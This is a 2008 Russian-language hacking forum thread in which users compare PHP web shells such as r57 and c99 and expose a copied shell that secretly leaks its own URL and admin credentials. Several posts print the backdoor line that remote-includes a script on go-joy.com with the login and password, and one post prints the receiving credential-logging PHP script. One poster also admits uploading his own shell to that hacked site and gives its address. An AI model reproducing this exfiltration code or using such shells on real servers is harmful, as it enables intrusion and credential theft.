каккой шел лучше r57shell c99shell или тот который я нашел

Discussion in 'PHP' started by eNergy, 17 Jun 2008.

  1. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    heks, это вполне логично. Антивирь не сравнивал процесс работы шеллов...
    Он просто сравнил сигнатуры.
     
  2. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    ну в этом я не силен
     
  3. oRb

    oRb Elder - Старейшина

    Joined:
    9 May 2008
    Messages:
    294
    Likes Received:
    582
    Reputations:
    256
    Причем здесь gzip?
    PHP:
    function selfURL() 
    {
        
    $s = empty($_SERVER["HTTPS"]) ? '' : ($_SERVER["HTTPS"] == "on") ? "s" "";
        
    $protocol strleft(strtolower($_SERVER["SERVER_PROTOCOL"]), "/").$s;
        
    $port = ($_SERVER["SERVER_PORT"] == "80") ? "" : (":".$_SERVER["SERVER_PORT"]);
        return 
    $protocol."://".$_SERVER['SERVER_NAME'].$port.$_SERVER['REQUEST_URI'];
    }
     
    $url=SelfURL();
    include(
    "http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass);  
    скрипт сливает адрес шелла автору. И накой такой шелл нужен?!
     
  4. heks

    heks Banned

    Joined:
    24 Aug 2007
    Messages:
    713
    Likes Received:
    95
    Reputations:
    12
    в каком смысл сливает?
     
  5. -Onotole-

    -Onotole- Elder - Старейшина

    Joined:
    10 Jun 2008
    Messages:
    44
    Likes Received:
    141
    Reputations:
    8
    PHP:
    include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass); 
    отправляет на www.go-joy.com логин и пасс от админки шелла ;/
     
  6. А®ТеS

    А®ТеS Active Member

    Joined:
    25 Nov 2006
    Messages:
    198
    Likes Received:
    193
    Reputations:
    41
    Это - не шелл. Это - говно! А теперь по пунктам:
    1. Он - говно.
    2. Дизайн не его (изменены два-три цвета)
    3. Движок не его (вообще ничего не изменено).
    4. Он - говно
    5. Он стучит о местоположение и аккаунте админа.
    6. Аккаунт незашифрован.
    7. Сниффер акков расположен на взломанном сайте (я туда, кстати, тоже шелл залил - http://www.go-joy.com/upload/temp/r57.php, поизучайте на :)).
    8. Он - говно!

    Содежржимое файла rcv.php (сниффера):
    Code:
    <?  $file = fopen("here.txt","a");  $res=$_GET["url"]."        ".$_GET["login"]."           ".$_GET["pass"];
      fputs($file,$res);  fclose($file);?>
    
    Содержимое here.txt:
    Code:
                       http://microsoft.com/nowelnahuy.php        fuckmoymosk           vrotmnenogi../../                                      
    
    LoL! Кто-то прикололся)))

    P.S. Я выкладываю УРЛ шелла ТОЛЬКО в целях показать сущность плагиатора для ТС и уважаемых Ачатовцев. Просьба не банить, не удалять, минусы не ставить.

    P.P.S. Он - говно!!!
     
    1 person likes this.
  7. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    Мой отжог :)
    Мне ктото месагу там оставил вместо моего шелла.
    В аську стукнул,
    Жду ответа.
     
  8. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,520
    Likes Received:
    401
    Reputations:
    196
    PHP:
    include("http://www.go-joy.com/upload/temp/rcv.php?url=".$url."&login=".$login."&pass=".$pass); 
    пипец какой извращенский способ сообщить данные хозяину -удаленный инклуд не всегда работает - да и тупо както...
    Проще fopen() -ом было бы))